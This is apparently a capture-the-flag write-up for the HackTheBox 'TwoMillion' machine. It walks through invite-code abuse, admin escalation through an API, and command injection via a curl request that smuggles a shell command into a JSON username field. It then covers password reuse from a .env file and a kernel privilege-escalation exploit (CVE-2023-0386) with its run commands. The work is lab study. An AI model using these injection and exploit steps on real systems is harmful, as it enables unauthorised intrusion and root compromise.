TwoMillion

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Wfuzz:

The old hackthebox site

You had to hack the invite code in order to create an account.
/invite

Obsfucated javascript code:

Used d4js to make sense of it:

function verifyInviteCode(code) {
    var formData = {
        "code": code
    };
    $.ajax({
        type: "POST",
        dataType: "json",
        data: formData,
        url: '/api/v1/invite/verify',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}

function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/how/to/generate',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}

Visiting the /api/v1/invite/how/to/generate replied with encrypted code:

Decrypted using ROT13

In order to generate the invite code, make a POST request to /api/v1/invite/generate

It returned a base64 enocded key:

Registered and logged in

List of endpoints:

Made myself and admin:

Injected a command in the id field

Sent a ping request:

curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=5putl0e0thh2nevv06ifv0ipbr" --header "Content-Type: application/json" --data '{"username":"test;ping -c 1 10.10.14.10;"}'

Initial Foothold

Got a reverse shell as www-data. Found password in /var/www/html/.env

Users with console:

Password reuse for admin. SSH as admin using password SuperDuperPass123

User.txt Proof Screenshot

Privilege Escalation

Seems the admin has some mail

https://nvd.nist.gov/vuln/detail/CVE-2021-3493

Copied exploit from
https://github.com/xkaneiki/CVE-2023-0386

Ran make all then ./fuse ./ovlcap/lower ./gc & (to run it in the background) and then ./exp

RootScreenshot Here: